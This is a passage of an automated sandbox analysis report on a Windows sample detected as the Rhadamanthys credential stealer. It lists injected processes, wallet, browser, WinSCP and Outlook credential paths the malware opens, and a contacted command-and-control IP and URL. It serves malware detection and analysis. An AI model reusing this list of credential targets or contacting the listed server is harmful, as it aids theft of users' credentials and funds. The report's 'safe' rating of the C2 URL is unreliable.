Source: OpenWith.exe, 00000003.00000003.2332693555.0000025B16D94000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLinkcLinkSymbolicLink
Source: OpenWith.exe, 00000003.00000003.2327644911.0000025B16FFB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: jKNN0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoLosLTOWYnCQQNUD+
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
Source: OpenWith.exe, 00000003.00000003.2339792801.0000025B16DB4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkmbolicLinkSymbolicLink
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: OpenWith.exe, 00000003.00000003.2339792801.0000025B16DB4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkLinkcLinkSymbolicLink
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: dialer.exe, 00000002.00000002.2240725076.0000000002BA8000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3331408408.0000025B14E80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: dialer.exe, 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: DisableGuestVmNetworkConnectivity
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: dialer.exe, 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: EnableGuestVmNetworkConnectivity
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: OpenWith.exe, 00000003.00000003.2321396838.0000025B17054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\wdeeFKntav.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_3_00CC2277 mov eax, dword ptr fs:[00000030h] 0_3_00CC2277
Source: C:\Windows\SysWOW64\dialer.exe Code function: 2_3_0272027F mov eax, dword ptr fs:[00000030h] 2_3_0272027F
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\wdeeFKntav.exe Code function: 0_2_00CC0AA0 HeapCreate,HeapAlloc,HeapAlloc,GetModuleHandleA,HeapAlloc,CreateEventA,HeapAlloc,HeapAlloc,GetProcessHeap,RtlAllocateHeap,memcpy,GetProcessHeap,HeapAlloc,memcpy,HeapFree,WaitForSingleObject,FindCloseChangeNotification,VirtualFree,GetProcessHeap,HeapFree,HeapDestroy, 0_2_00CC0AA0
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_0000025B14E21A90 NtAcceptConnectPort,NtAcceptConnectPort,RtlAddVectoredExceptionHandler, 3_2_0000025B14E21A90
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\wdeeFKntav.exe Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe" Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe" Jump to behavior
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Windows\System32\OpenWith.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F04F83C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe, 3_2_00007DF41F04F83C
Source: C:\Windows\System32\OpenWith.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected RHADAMANTHYS Stealer
Source: Yara match File source: 00000002.00000003.2114030735.0000000002B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2110064787.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2241149327.0000000004570000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2113793924.0000000003C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Found many strings related to Crypto-Wallets (likely being stolen)
Source: OpenWith.exe, 00000003.00000003.2331811835.0000025B16E48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: !CP:Defichain-Electrum
Source: OpenWith.exe, 00000003.00000003.2319977059.0000025B16E29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\ElectronCash\config
Source: OpenWith.exe, 00000003.00000003.2331811835.0000025B16E48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\com.liberty.jaxx
Source: OpenWith.exe, 00000003.00000003.2287811243.0000025B16D6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\Exodus\exodus.wallet
Source: OpenWith.exe, 00000003.00000003.2287811243.0000025B16D6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
Source: OpenWith.exe, 00000003.00000003.2287811243.0000025B16D6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\Exodus\exodus.wallet
Source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\BinanceP
Source: OpenWith.exe, 00000003.00000003.2318510901.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\Coinomi\Coinomi\wallets
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings\main\ms-language-packs Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\safebrowsing\google4 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\921a1560-5524-44c0-8495-fce7014dcfba Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\doomed Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\startupCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\safebrowsing Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\thumbnails Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\f0479a66-61f1-42d6-a1ab-d023ed0adaa0 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings\main\ms-language-packs\browser Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\0absryc3.default Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings\main Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings\main\ms-language-packs\browser\newtab Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\ff366d85-2475-4dfc-a5c6-01e0d6f59500 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: OpenWith.exe PID: 1880, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected RHADAMANTHYS Stealer
Source: Yara match File source: 00000002.00000003.2114030735.0000000002B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2110064787.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2241149327.0000000004570000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2113793924.0000000003C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F04F83C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe, 3_2_00007DF41F04F83C
Source: C:\Windows\System32\OpenWith.exe Code function: 3_2_00007DF41F0814B8 socket,bind, 3_2_00007DF41F0814B8
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1446715 Sample: wdeeFKntav.exe Startdate: 23/05/2024 Architecture: WINDOWS Score: 96 17 Antivirus / Scanner detection for submitted sample 2->17 19 Multi AV Scanner detection for submitted file 2->19 21 Yara detected RHADAMANTHYS Stealer 2->21 23 3 other signatures 2->23 7 wdeeFKntav.exe 1 2->7         started        process3 process4 9 dialer.exe 7->9         started        dnsIp5 15 94.156.8.232, 443, 49699, 49707 NET1-ASBG Bulgaria 9->15 12 OpenWith.exe 9->12         started        process6 signatures7 25 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->25 27 Tries to steal Mail credentials (via file / registry access) 12->27 29 Found many strings related to Crypto-Wallets (likely being stolen) 12->29 31 2 other signatures 12->31
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
94.156.8.232
 unknown Bulgaria
43561 NET1-ASBG false

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://94.156.8.232/c1402fa62dc004/s209r0u5.lrdw9 false
  • Avira URL Cloud: safe
 unknown